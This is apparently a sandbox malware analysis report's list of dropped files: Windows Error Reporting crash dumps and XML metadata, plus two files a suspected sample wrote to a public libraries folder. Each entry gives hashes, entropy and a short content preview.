                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERACE2.tmp.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4686
                                                                    Entropy (8bit):4.480657334406777
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYKyYm8M4JMDaJFe+q8nlLHL0V0G9d:uIjfuI7xh7VzJMDFcBL0V0G9d
                                                                    MD5:7A1E5E7ED9CFA2732348A79C5778F59B
                                                                    SHA1:1B0F46205522FBE3F2B498A50A1CB5A2C3C3BB18
                                                                    SHA-256:BB0CFB253794CA11025AA8C46C28D2C3A3BC11995CDA6BA8B909C60B8DBE9273
                                                                    SHA-512:73CE35CFF8198A3632E7DF57749C1ABDA342901B65B75991DB330B26314312978503450D3BB6D90CE6828338474A13EAA18EF0CFD0471FBF3E6C6FB4B3953D7C
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB5F8.tmp.dmp

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:39 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):43218
                                                                    Entropy (8bit):2.0776634274567973
                                                                    Encrypted:false
                                                                    SSDEEP:192:pwClRXcqXdVWhO0e91TJeYpRdwPoup3dYHHE7Hdy14Hm3oX3+:Vll1Vf0sTJ32PoY3i0dy1K3+
                                                                    MD5:860331CD4832C4C333022E578C941324
                                                                    SHA1:402EDB176E54B174A4254CBA1A36B614841D1D38
                                                                    SHA-256:DB83C6CEB8F051C927CC4B0C0B3F134B76EAA794E7D61756F8B5951FBD5D7C65
                                                                    SHA-512:B299FEB1381ED38A54A356BE5FD446B07BA70AEADD8768446FEC8D401545715E63673AE57AE03DDFAE65E5C236AF3FE70E17E7E2E4BCBD585D4AF75830720AF6
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................,..........T.......8...........T...........................0...........................................................................................eJ..............GenuineIntel............T............tEg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB695.tmp.WERInternalMetadata.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):6364
                                                                    Entropy (8bit):3.721683555396351
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJNc6+CkDYNwehSpDk89biRPsfcBXfABm:R6lXJG6OYNfhOiR0fcBY8
                                                                    MD5:21449DAE87F8E521DC7836EADABB668D
                                                                    SHA1:0001503F0D070530996D51A43EF0D2F121D63E27
                                                                    SHA-256:B7DF83C9A2A095C4DBAECF0180E041C99C5213F8DD3E819E582FA99193AEE765
                                                                    SHA-512:F5EA29DD101C25D1B186B11299970A6EDBDE04FE3959DCA1870865D57F63C75D773649FD8BE09CF4478F5BFC262A9D9230652CF6DF5448D594758019C3B54B73
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.8.0.<./.P.i.

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6C5.tmp.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4690
                                                                    Entropy (8bit):4.480444114625285
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYEYm8M4JMDaq2OqFQO+q8nNvSOAL0V0e9d:uIjfuI7xh7VIJMDx29cN63L0V0e9d
                                                                    MD5:24F892C6852BF7E1013FAA133F5D0FD8
                                                                    SHA1:47579327E5EC7BD7BE84D6735908E6D6B48BC4D8
                                                                    SHA-256:187BDF2085303616E31FCA909D88C83369CD6B885EEEE56D28F585B60B23C945
                                                                    SHA-512:FFE7B0296217BF95F5EB4467C30887E293B4B4FD69B068D4AA0321DFFF5C7A57DED381E8B9B8C0767A0119F88B9F072F4D7DBCFB92394F89D3913D42914EA304
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC2C9.tmp.dmp

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:43 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):43150
                                                                    Entropy (8bit):2.0783368261806165
                                                                    Encrypted:false
                                                                    SSDEEP:192:9YRXcqXdV+8O0e9+0xe9xw12DdEp1WQ/7t4TMxAtLH:+l1V+z08xe9xwQQ1WC7t4VtLH
                                                                    MD5:C64870AFD1BA6A0AB29FD72B343FCF04
                                                                    SHA1:EA7F9711B7202E9B1DC632B0208A6152E66BDB3A
                                                                    SHA-256:6939A6A78A7C57EF1AF025C1FDBC8AD4F06E2B3F4E68302CEA730150467578DB
                                                                    SHA-512:9C28D8EBA0680629538916884593841A6B06BCEF2CB2853ABD3D76C021788FA715281F66001B510F0BE0054A2820616BD114A217974345C23F0358ACB32D3E51
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................,..........T.......8...........T...........P...>...........0...........................................................................................eJ..............GenuineIntel............T............tEg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3B4.tmp.WERInternalMetadata.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):6358
                                                                    Entropy (8bit):3.721332007381041
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJuC6eMvYNwehSpD289bB2sfLrm:R6lXJL6eMvYNfhQBVfm
                                                                    MD5:E57AA7EB8A949D5DE52C6EC41F8258AE
                                                                    SHA1:3D4D82809045E2E7B134DD149551B1AF9D0A9504
                                                                    SHA-256:7D2498A259DB88F97A7B4487C5A98F9073F7318F7413714A95CF326EFAD7B80E
                                                                    SHA-512:004E82C5B8177D2F65DCAFDF322DB7E26B17F4B04DA74FA979D30501D06AE1552136CCF79054D39CA42AC522DAEE3ACD33CCCD1F179F3B54B3F38A5830BA5BCD
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3F4.tmp.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4690
                                                                    Entropy (8bit):4.478447830869072
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYFzYm8M4JMDaq2OqFcSh+q8nNvyOhHL0V0G9d:uIjfuI7xh7VkmJMDx2IShcN62L0V0G9d
                                                                    MD5:14A50A80D69058F92DA76D2EE95596A5
                                                                    SHA1:34616670EC5E55B9DE7372BFF79DB25A11DFCF65
                                                                    SHA-256:D5E1C0C24AAA502EA82F6964BA4DFC3067BADE122F14A6C1DE57C74C379136A0
                                                                    SHA-512:3E14FB122113EFA4101AA8F7EE1076DDFE87FF646610B3D668A4AFCD72889769AAA2D65D351B104FBB17670F25F12679039085908225C50EBAB42859D3B94DD8
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD29.tmp.dmp

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:45 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):46174
                                                                    Entropy (8bit):2.0510837781154927
                                                                    Encrypted:false
                                                                    SSDEEP:192:T+CXFX9/2x5Y9OiBr3S3NL5SFEWjESZzar/gwzDMEzc:j+LYw23kNLwFHZzaDgwfg
                                                                    MD5:EC4B975BABF8774A7FA38EA40FE4F8B5
                                                                    SHA1:09F663393E27607A48C0916B161F3DBB1074B7D2
                                                                    SHA-256:0A1976E12F20225B1BDDE89E5EBDAB384C0FA381E9D73BA9BF863662357C0B23
                                                                    SHA-512:0167C1793F9B5931A27516C270D66938C4D2F78DFBD02B56189643163D202F567ED1AC36FDEAE8CD545495DD29689CA1D27D8F18D4BB623E0A851B3241122B92
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................*..........T.......8...........T........... ...>.......................l...............................................................................eJ..............GenuineIntel............T.......`....tEg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE53.tmp.WERInternalMetadata.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8378
                                                                    Entropy (8bit):3.701673140123279
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJeL6M6Ya36A/64gmfbNfxYprB89bXTsfAdm:R6lXJy6M6Ya6A/lgmfbNfFX4fX
                                                                    MD5:FFEC970F7D345CEB383A1344EB429D0B
                                                                    SHA1:33CDA6E0248E0E7E4ABEF5A484E534B86B9908BA
                                                                    SHA-256:69F4E6A294C8FBB71F659DA76817EB32391DD323AC49F09FAFB5A71AC98188BB
                                                                    SHA-512:7F570AEEA7F101D697866E976D5447D0338BCEDC54F18EF8479A43657C1893409F1831660CC829D8C91EF203E86B375A429B2A4BA2D9236F76EB2CA0EBBC24E6
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.7.6.<./.P.i.

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE73.tmp.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4680
                                                                    Entropy (8bit):4.490544636926762
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYlvYm8M4JgKJFGZ+q8fLlzPd73d:uIjfuI7xh7VtJgZZSpZ73d
                                                                    MD5:1ED9D975D08F67D552B0DB7E78755FC1
                                                                    SHA1:A4EFC3322531D305EB6F9AC03AEF8414FC35760C
                                                                    SHA-256:F14F65A6252BEB4EC9B4AC3330DE7EA398F0AD0AC34E85D07C8670DECCD71222
                                                                    SHA-512:54772F4B39881B8B77BB081601437F7953F2FCC78D94130069D7879BE36FB8A44976EEA4A6A800724D3033CC722EBC68DCE83A5B7AEEC181408E8243AC06735A
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE351.tmp.dmp

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:51 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):42442
                                                                    Entropy (8bit):2.0707634709293115
                                                                    Encrypted:false
                                                                    SSDEEP:192:VZMUXFX9/2VobqOiBrSUqS3NyASFEWjESZurtLHFGOY/dly:TL+ib12SJkNybFHZuxw/dly
                                                                    MD5:76760AA35BE69277AABD02EF9765C709
                                                                    SHA1:5115F1B60468B49E58C19670400AD2816C09CBBE
                                                                    SHA-256:BBC05D3FFE1C8B8241FDB61974F02D24DCCDB1522EA229C03D7A7D80E47958E8
                                                                    SHA-512:227D7E5A75D153F2A26F00F319E44CEF79257C8881BB323144440C678DB5ACE10D7E82E167B2582319D34B214293B4EF584F23370D9BE1E3FE20FFA25E5F32D2
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................*..........T.......8...........T......................................l...............................................................................eJ..............GenuineIntel............T.......`....tEg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE40E.tmp.WERInternalMetadata.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8382
                                                                    Entropy (8bit):3.7015046563241127
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJeJ6PE6YaK6A/24gmfbJhSpDZ89bSTsf+bGm:R6lXJg686YH6A/ZgmfbJh5S4fo
                                                                    MD5:304B3F4AE34EFA6DDE43A344E8392138
                                                                    SHA1:58F9F102F75BB77D83B89158BE068B01F1121AF3
                                                                    SHA-256:1370DAD663149BA599A7095E57A772ADA657A972A00584D052EDB1D76F0C0DC6
                                                                    SHA-512:D40FF859EC14D30BD9E158805C9AAC27FF0049F89F7A64934D74AB2A0C753FF93883AB52320ECDF4ADC72A02C41A7E9553EB29C0E6DE93F4B49CE43D831F92B0
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.7.6.<./.P.i.

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE42E.tmp.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4684
                                                                    Entropy (8bit):4.488275185548259
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYBPYm8M4JgKq8NOqFZ+q8fvvgNObzPd73d:uIjfuI7xh7VhJghAlSvcEZ73d
                                                                    MD5:5C67EBF630D1EB0E2031B86240B87928
                                                                    SHA1:C58B50811EC01910E431FF5319242E6439FEEF42
                                                                    SHA-256:1E75C062BF7CBAE47A9B37F37CADF5FA085A91C120B0CA9A9FA5F2B81C27A950
                                                                    SHA-512:A3AE6BECCB13930A4338D5A25B6D9DA82F9B235DCD9041015680CC6B314E48AC3C8C6FB341C66D865104DB98B035D3D2FF79137716E5DC04567C6FE1188F1098
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                    C:\Users\Public\Libraries\PNO

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\nft438A5fN.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4
                                                                    Entropy (8bit):2.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:Jn:Jn
                                                                    MD5:17A1D5E252F7DEA2B5162C7E8CE55239
                                                                    SHA1:0796EB344F59291ECB828FB4307BF831314A72DC
                                                                    SHA-256:8C094FA7A36D960F46EB971614F084207C9A037D28C4B42B622F887EFE455D99
                                                                    SHA-512:2DE9E6087141362BF25773C77FADB788B5A88A8FB55373848C044C6DE62ACEC8905588610A1CDACB746A4AD3F93B4415A09B05A868650B13CE8114F2AE1CFC8E
                                                                    Malicious:false
                                                                    Preview:47..

                                                                    C:\Users\Public\Libraries\Wuqtggvo

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\nft438A5fN.exe
                                                                    File Type:OpenPGP Public Key
                                                                    Category:dropped
                                                                    Size (bytes):838507
                                                                    Entropy (8bit):7.209014553711061
                                                                    Encrypted:false
                                                                    SSDEEP:24576:jd5ZkzD4mqRJoxR//LpKKxrRLhazb/ncVkvi+R:OzDPxNJtuPKKi+R
                                                                    MD5:864518C2AAECE1BCAABEC65C2F3A9926
